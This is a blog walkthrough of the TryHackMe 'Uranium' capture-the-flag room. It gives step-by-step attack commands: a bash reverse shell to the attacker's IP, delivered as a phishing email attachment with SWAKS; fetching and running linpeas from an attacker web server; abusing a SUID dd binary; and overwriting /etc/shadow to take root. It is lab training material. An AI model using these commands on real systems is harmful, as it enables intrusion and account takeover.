My second Youtube video is now live! This time around its for the Try Hack Me Uranium CTF and you can watch it here!
The Uranium Writeup!
So, This writeup is for Uranium and it is listed as Hard room on Try Hack Me (Link at the bottom)
It did challenge me! But, it was a really enjoyable room to do so I encourage you to give it a go.
The brief gave us some starting points and also gives us our goals for this which are;
- Password for the Chat App
- What is hakanbey’s password
- user_1.txt flag
- user_2.txt flag
Firstly, lets add the IP into our hosts
echo "<THM_IP> uranium.thm" | sudo tee -a /etc/hosts #NOTE: I have to add whats after the | because of how i run my Kali environment, you may not need to add this
And now moving into Nmap
nmap -sC -sV -p- -oN ./nmap/initial uranium.thm
From our nmap scan, we had SSH, SMTP and HTTP open.
Does he Tweet?
In the room description there is a link to a twitter account, lets take a look
So, from these tweets, we can find the following;
- Domain is uranium.thm
- He opens all application files with the filename “application” in terminal
- We have his username
Love twitter enumeration!
The uranium site gave nothing away so lets move on….
You’ve got Mail!
The breadcrumbs I found are pointing towards an email attack so we will move into this using SWAKS.
Firstly we need a file called application with a reverse shell, since its opened in terminal, lets use bash.
echo 'bash -c "bash -i >& /dev/tcp/<YOUR_THM_IP>/9006 0>&1"' > application
Then start our netcat listener with;
nc -lnvp 9006
Then we are going to use SWAKS to send the email with;
swaks --to email@example.com --from firstname.lastname@example.org --header "RE:Coins" --body "I want coins" --attach application --server <THM_IP>
Wait until we catch the reverse shell….
In hakanbey’s home folder you will find user_1.txt and open with
There is also a file called chat_with_kral4. Trying to run this I got a request for a password which I had no idea what it was.
We need to enumerate which I’m going to use LinPeas to do
#Change into the directory with your linpeas.sh file in then run; python3 -m http.server #note what port the HTTP server started on, then on the reverse shell wget http://<Your_THM_IP>:<HTTP_PORT>/linpeas.sh chmod +x linpeas.sh ./linpeas.sh
After running Linpeas, there was two things I prioritized looking at;
- A .pcap file in /var/log
- Linpeas highlighted /bin/dd
Firstly, lets get that pcap! In order to do that we are going to change into the directory, upgrade our shell, start a webserver, then download this to our Kali terminal.
# On the reverse shell cd /var/log export TERM=xterm python3 -c 'import pty;pty.spwan("/bin/bash")' python3 -m http.server 8010 # On your Kali Machine wget http://<THM_IP>:8010/hakanbey_network_log.pcap
We have the pcap file!
Open this in wireshark, right click on the first entry then follow>TCP Stream and you will have the password for the chat app!
So, after running the webserver I had to CTRL+C to get out of it!
So i started the Netcat listener as before, sent the email we did before and i was back in with my reverse shell.
Once in there as hakanbey, I ran the chat application with;
When it asks you for a password this time use the one from the PCAP file.
Now, the fun part! Talk to the chat app to get hakanbey’s password!
So now lets ssh into the box as hakanbey using the password we got
Lets check what hakanbey can do with
Looks like there is another command hakanbey can run with that!
sudo -u <COMMAND_FROM_SUDO-L>
Now, lets change into that users home directory and you will find the user2 flag
cd /home/kral4 cat user_2.txt
A DD to the Web?
So with two flag’s left to get, i decided on the web flag!
With it being the web flag, I decided to check where the website would be
Then looking in that folder I found web_flag.txt! Awesome!
And we have web flag…… no…..wait….. That would be too easy! So how do we get the flag? We had /bin/dd to check out didn’t we….
So that has file write, file read, suid and sudo and we want to read a file…..
/bin/dd if=web_flag.txt #NOTE: Please look at the GTFO Bin to understand why this works rather than just pasting the code
Fake an Attack? Really?
When you SSH into the machine a note says you have mail, obviously we should be reading other peoples emails! Lets have a look in;
cd /var/mail ls
There is mail for kral4 so lets;
There wasn’t a nano file in kral4’s home directory
So lets go there, copy nano and see if it has suid
cp /bin/nano /home/kral4 cd /home/kral4
So we have nano in there but it doesn’t have SUID
The copied nano doesn’t have SUID!
It did say to keep it there in case index.html was attacked again….. lets attack index.html and see what happens….
We can use the /bin/dd to make a change to the index.html file so lets do that with;
echo "theirsecurity.com" | /bin/dd of=/var/www/html/index.html
We amended the index.html file, but did we get SUID?
Success!! We got it!!
Perl to Root
We have a few different options to take to get root access, but now i have nano with SUID im going to amend etc/shadow.
So lets open this with;
We obviously just cant type a new root password into their as it wouldn’t work, but we can use perl to generate one. So in a terminal window type;
perl -e "print crypt('password','\$6\$SALTsalt\$')" #NOTE: where i have typed password, that is the password it will use to generate
So we can take this and paste this into our shadow file. Paste this between root: and the second :
If you want to see this done, you can use the video at the top of the page #shamelessplug
So CTRL+X to exit and then Y then enter.
We have changed the root password, now to use it!
su root # then enter the password we changed it to
We are now root!
Change into the root directory and cat the root.txt file
Try Hack Me Uranium Conclusion
I really enjoyed this room a lot!
The chatbot was a great addition and i think hakanbey did an amazing job at replicating a phishing attack on a virtual machine. It was a great implementation and practicing phishing attacks isn’t common in capture the flag environments!
It is labelled as a hard room, i can see why because the path’s you take arent guided (this makes it more fun). What you see above is the way i managed to complete it, it doesn’t include every path I took that didn’t work, but I just kept going at it!
I really recommend you give this a go!
I hope you enjoyed reading!
Go to http://www.tryhackme.com/ to try this and many more CTF’s
If you want to go directly to Try Hack Me Uranium – https://tryhackme.com/room/uranium – Thanks again to hakanbey01
Contact Me with any requests or suggestions for next room!